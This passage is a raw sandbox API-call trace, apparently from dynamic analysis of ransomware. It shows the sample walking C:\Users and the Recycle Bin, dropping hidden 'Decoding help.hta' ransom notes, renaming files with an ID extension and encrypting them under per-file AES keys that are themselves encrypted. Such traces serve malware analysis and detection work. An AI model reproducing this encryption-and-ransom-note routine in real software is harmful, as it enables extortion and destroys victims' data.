lpFileName="\\\\?\\C:\\Users\\*.*", lpFindFileData=0x3e4fd30 | out: lpFindFileData=0x3e4fd30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a5330 [0038.602] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0038.602] FindNextFileW (in: hFindFile=0x5a5330, lpFindFileData=0x3e4fd30 | out: lpFindFileData=0x3e4fd30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0038.602] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0038.602] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0038.602] FindNextFileW (in: hFindFile=0x5a5330, lpFindFileData=0x3e4fd30 | out: lpFindFileData=0x3e4fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 1 [0038.602] lstrcmpW (lpString1=".", lpString2="5p5NrGJn0jS HALPmcxz") returned -1 [0038.602] lstrcmpW (lpString1="..", lpString2="5p5NrGJn0jS HALPmcxz") returned -1 [0038.602] lstrcmpiW (lpString1="windows", lpString2="5p5NrGJn0jS HALPmcxz") returned 1 [0038.603] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\*.*" | out: lpString1="\\\\?\\C:\\Users\\*.*") returned="\\\\?\\C:\\Users\\*.*" [0038.603] lstrlenW (lpString="\\\\?\\C:\\Users\\*.*") returned 16 [0038.603] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\", lpString2="5p5NrGJn0jS HALPmcxz" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz" [0038.603] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*" [0038.603] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x42205f8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1ec [0038.613] CloseHandle (hObject=0x1ec) returned 1 [0038.613] FindNextFileW (in: hFindFile=0x5a5330, lpFindFileData=0x3e4fd30 | out: lpFindFileData=0x3e4fd30*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="All Users", cAlternateFileName="ALLUSE~1")) returned 1 [0038.613] lstrcmpW (lpString1=".", lpString2="All Users") returned -1 [0038.613] lstrcmpW (lpString1="..", lpString2="All Users") returned -1 [0038.613] lstrcmpiW (lpString1="windows", lpString2="All Users") returned 1 [0038.614] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\*.*" | out: lpString1="\\\\?\\C:\\Users\\*.*") returned="\\\\?\\C:\\Users\\*.*" [0038.614] lstrlenW (lpString="\\\\?\\C:\\Users\\*.*") returned 16 [0038.614] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\", lpString2="All Users" | out: lpString1="\\\\?\\C:\\Users\\All Users") returned="\\\\?\\C:\\Users\\All Users" [0038.614] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\*.*") returned="\\\\?\\C:\\Users\\All Users\\*.*" [0038.614] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x4280798, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1ec [0038.625] CloseHandle (hObject=0x1ec) returned 1 [0038.625] FindNextFileW (in: hFindFile=0x5a5330, lpFindFileData=0x3e4fd30 | out: lpFindFileData=0x3e4fd30*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x62fa4a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="Default", cAlternateFileName="")) returned 1 [0038.625] lstrcmpW (lpString1=".", lpString2="Default") returned -1 [0038.625] lstrcmpW (lpString1="..", lpString2="Default") returned -1 [0038.625] lstrcmpiW (lpString1="windows", lpString2="Default") returned 1 [0038.626] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\*.*" | out: lpString1="\\\\?\\C:\\Users\\*.*") returned="\\\\?\\C:\\Users\\*.*" [0038.626] lstrlenW (lpString="\\\\?\\C:\\Users\\*.*") returned 16 [0038.626] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\", lpString2="Default" | out: lpString1="\\\\?\\C:\\Users\\Default") returned="\\\\?\\C:\\Users\\Default" [0038.626] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Default\\*.*") returned="\\\\?\\C:\\Users\\Default\\*.*" [0038.626] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5c18180, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1ec [0038.637] CloseHandle (hObject=0x1ec) returned 1 [0038.637] FindNextFileW (in: hFindFile=0x5a5330, lpFindFileData=0x3e4fd30 | out: lpFindFileData=0x3e4fd30*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Default User", cAlternateFileName="DEFAUL~1")) returned 1 [0038.637] lstrcmpW (lpString1=".", lpString2="Default User") returned -1 [0038.637] lstrcmpW (lpString1="..", lpString2="Default User") returned -1 [0038.637] lstrcmpiW (lpString1="windows", lpString2="Default User") returned 1 [0038.638] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\*.*" | out: lpString1="\\\\?\\C:\\Users\\*.*") returned="\\\\?\\C:\\Users\\*.*" [0038.639] lstrlenW (lpString="\\\\?\\C:\\Users\\*.*") returned 16 [0038.639] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\", lpString2="Default User" | out: lpString1="\\\\?\\C:\\Users\\Default User") returned="\\\\?\\C:\\Users\\Default User" [0038.639] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default User", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Default User\\*.*") returned="\\\\?\\C:\\Users\\Default User\\*.*" [0038.639] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5c90388, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1ec [0038.646] CloseHandle (hObject=0x1ec) returned 1 [0038.646] FindNextFileW (in: hFindFile=0x5a5330, lpFindFileData=0x3e4fd30 | out: lpFindFileData=0x3e4fd30*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x286e4016, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x286e4016, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0038.646] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Users\\*.*" | out: lpString1="\\\\?\\C:\\Users\\*.*") returned="\\\\?\\C:\\Users\\*.*" [0038.646] lstrlenW (lpString="\\\\?\\C:\\Users\\*.*") returned 16 [0038.647] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\Decoding help.hta") returned="\\\\?\\C:\\Users\\Decoding help.hta" [0038.647] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Decoding help.hta" (normalized: "c:\\users\\decoding help.hta")) returned 0xffffffff [0038.647] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Decoding help.hta" (normalized: "c:\\users\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ec [0038.649] WriteFile (in: hFile=0x1ec, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x3e4fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x3e4fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0038.649] CloseHandle (hObject=0x1ec) returned 1 [0038.650] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0038.650] lstrcmpiW (lpString1="Decoding help.hta", lpString2="desktop.ini") returned -1 [0038.650] lstrlenW (lpString="desktop.ini") returned 11 [0038.650] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\*.*" | out: lpString1="\\\\?\\C:\\Users\\*.*") returned="\\\\?\\C:\\Users\\*.*" [0038.650] lstrlenW (lpString="\\\\?\\C:\\Users\\*.*") returned 16 [0038.650] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\", lpString2="desktop.ini" | out: lpString1="\\\\?\\C:\\Users\\desktop.ini") returned="\\\\?\\C:\\Users\\desktop.ini" [0038.650] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\desktop.ini" | out: lpString1="\\\\?\\C:\\Users\\desktop.ini") returned="\\\\?\\C:\\Users\\desktop.ini" [0038.650] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\desktop.ini", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]" [0038.650] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\desktop.ini" (normalized: "c:\\users\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\desktop.ini.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0038.651] CreateFileW (lpFileName="\\\\?\\C:\\Users\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\desktop.ini.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ec [0038.651] CreateFileMappingA (hFile=0x1ec, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x1a4 [0038.651] CryptAcquireContextA (in: phProv=0x3e4fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3e4fcec*=0x5a7c68) returned 1 [0038.652] CryptGenKey (in: hProv=0x5a7c68, Algid=0x6610, dwFlags=0x1, phKey=0x3e4fce8 | out: phKey=0x3e4fce8*=0x5a5370) returned 1 [0038.652] CryptExportKey (in: hKey=0x5a5370, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x3e4fbe4, pdwDataLen=0x3e4fce4 | out: pbData=0x3e4fbe4*, pdwDataLen=0x3e4fce4*=0x2c) returned 1 [0038.652] MapViewOfFile (hFileMappingObject=0x1a4, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xa0) returned 0x2d0000 [0038.653] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3e4fbe4*, pdwDataLen=0x3e4fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x3e4fbe4*, pdwDataLen=0x3e4fcf8*=0x100) returned 1 [0038.653] CryptEncrypt (in: hKey=0x5a5370, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2d0000*, pdwDataLen=0x3e4fce4*=0xa0, dwBufLen=0xa0 | out: pbData=0x2d0000*, pdwDataLen=0x3e4fce4*=0xa0) returned 1 [0038.653] UnmapViewOfFile (lpBaseAddress=0x2d0000) returned 1 [0038.653] CloseHandle (hObject=0x1a4) returned 1 [0038.653] CryptDestroyKey (hKey=0x5a5370) returned 1 [0038.653] CryptReleaseContext (hProv=0x5a7c68, dwFlags=0x0) returned 1 [0038.653] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0038.653] WriteFile (in: hFile=0x1ec, lpBuffer=0x3e4fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3e4fcf8, lpOverlapped=0x0 | out: lpBuffer=0x3e4fbe4*, lpNumberOfBytesWritten=0x3e4fcf8*=0x100, lpOverlapped=0x0) returned 1 [0038.654] WriteFile (in: hFile=0x1ec, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x3e4fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x3e4fcf8*=0x500, lpOverlapped=0x0) returned 1 [0038.655] CloseHandle (hObject=0x1ec) returned 1 [0038.656] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0038.656] FindNextFileW (in: hFindFile=0x5a5330, lpFindFileData=0x3e4fd30 | out: lpFindFileData=0x3e4fd30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x917fa2ee, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Public", cAlternateFileName="")) returned 1 [0038.656] lstrcmpW (lpString1=".", lpString2="Public") returned -1 [0038.656] lstrcmpW (lpString1="..", lpString2="Public") returned -1 [0038.656] lstrcmpiW (lpString1="windows", lpString2="Public") returned 1 [0038.657] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\*.*" | out: lpString1="\\\\?\\C:\\Users\\*.*") returned="\\\\?\\C:\\Users\\*.*" [0038.657] lstrlenW (lpString="\\\\?\\C:\\Users\\*.*") returned 16 [0038.657] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\", lpString2="Public" | out: lpString1="\\\\?\\C:\\Users\\Public") returned="\\\\?\\C:\\Users\\Public" [0038.657] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Public", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Public\\*.*") returned="\\\\?\\C:\\Users\\Public\\*.*" [0038.657] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5cf0528, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1ec [0038.665] CloseHandle (hObject=0x1ec) returned 1 [0038.665] FindNextFileW (in: hFindFile=0x5a5330, lpFindFileData=0x3e4fd30 | out: lpFindFileData=0x3e4fd30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x917fa2ee, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Public", cAlternateFileName="")) returned 0 [0038.665] FindClose (in: hFindFile=0x5a5330 | out: hFindFile=0x5a5330) returned 1 Thread: id = 23 os_tid = 0xa90 [0038.993] FindFirstFileW (in: lpFileName="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\*.*", lpFindFileData=0x3f8fd30 | out: lpFindFileData=0x3f8fd30*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb63e4b00, ftLastAccessTime.dwHighDateTime=0x1d337f4, ftLastWriteTime.dwLowDateTime=0xb63e4b00, ftLastWriteTime.dwHighDateTime=0x1d337f4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a52f0 [0038.993] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0038.993] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x3f8fd30 | out: lpFindFileData=0x3f8fd30*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb63e4b00, ftLastAccessTime.dwHighDateTime=0x1d337f4, ftLastWriteTime.dwLowDateTime=0xb63e4b00, ftLastWriteTime.dwHighDateTime=0x1d337f4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0038.993] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0038.993] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0038.993] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x3f8fd30 | out: lpFindFileData=0x3f8fd30*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x81, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0038.993] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\*.*" | out: lpString1="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\*.*") returned="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\*.*" [0038.994] lstrlenW (lpString="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\*.*") returned 70 [0038.994] lstrcatW (in: lpString1="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\Decoding help.hta") returned="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\Decoding help.hta" [0038.994] GetFileAttributesW (lpFileName="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\Decoding help.hta" (normalized: "c:\\$recycle.bin\\s-1-5-21-3388679973-3930757225-3770151564-1000\\decoding help.hta")) returned 0xffffffff [0038.994] CreateFileW (lpFileName="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\Decoding help.hta" (normalized: "c:\\$recycle.bin\\s-1-5-21-3388679973-3930757225-3770151564-1000\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0038.994] WriteFile (in: hFile=0x1c4, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x3f8fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x3f8fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0038.995] CloseHandle (hObject=0x1c4) returned 1 [0038.995] SetFileAttributesW (lpFileName="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0038.996] lstrcmpiW (lpString1="Decoding help.hta", lpString2="desktop.ini") returned -1 [0038.996] lstrlenW (lpString="desktop.ini") returned 11 [0038.996] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\*.*" | out: lpString1="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\*.*") returned="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\*.*" [0038.996] lstrlenW (lpString="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\*.*") returned 70 [0038.996] lstrcatW (in: lpString1="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\", lpString2="desktop.ini" | out: lpString1="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini" [0038.996] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini" | out: lpString1="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini" [0038.996] lstrcatW (in: lpString1="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]" [0038.996] MoveFileW (lpExistingFileName="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini" (normalized: "c:\\$recycle.bin\\s-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini"), lpNewFileName="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\$recycle.bin\\s-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0038.996] CreateFileW (lpFileName="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\$recycle.bin\\s-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0038.996] CreateFileMappingA (hFile=0x1c4, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x1b8 [0038.997] CryptAcquireContextA (in: phProv=0x3f8fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3f8fcec*=0x5a7c68) returned 1 [0038.997] CryptGenKey (in: hProv=0x5a7c68, Algid=0x6610, dwFlags=0x1, phKey=0x3f8fce8 | out: phKey=0x3f8fce8*=0x5a52b0) returned 1 [0038.997] CryptExportKey (in: hKey=0x5a52b0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x3f8fbe4, pdwDataLen=0x3f8fce4 | out: pbData=0x3f8fbe4*, pdwDataLen=0x3f8fce4*=0x2c) returned 1 [0038.997] MapViewOfFile (hFileMappingObject=0x1b8, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x80) returned 0x2d0000 [0038.998] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3f8fbe4*, pdwDataLen=0x3f8fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x3f8fbe4*, pdwDataLen=0x3f8fcf8*=0x100) returned 1 [0038.999] CryptEncrypt (in: hKey=0x5a52b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2d0000*, pdwDataLen=0x3f8fce4*=0x80, dwBufLen=0x80 | out: pbData=0x2d0000*, pdwDataLen=0x3f8fce4*=0x80) returned 1 [0038.999] UnmapViewOfFile (lpBaseAddress=0x2d0000) returned 1 [0038.999] CloseHandle (hObject=0x1b8) returned 1 [0038.999] CryptDestroyKey (hKey=0x5a52b0) returned 1 [0038.999] CryptReleaseContext (hProv=0x5a7c68, dwFlags=0x0) returned 1 [0038.999] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0038.999] WriteFile (in: hFile=0x1c4, lpBuffer=0x3f8fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3f8fcf8, lpOverlapped=0x0 | out: lpBuffer=0x3f8fbe4*, lpNumberOfBytesWritten=0x3f8fcf8*=0x100, lpOverlapped=0x0) returned 1 [0039.000] WriteFile (in: hFile=0x1c4, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x3f8fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x3f8fcf8*=0x500, lpOverlapped=0x0) returned 1 [0039.000] CloseHandle (hObject=0x1c4) returned 1 [0039.001] SetFileAttributesW (lpFileName="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0039.002] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x3f8fd30 | out: lpFindFileData=0x3f8fd30*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x81, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0039.002] FindClose (in: 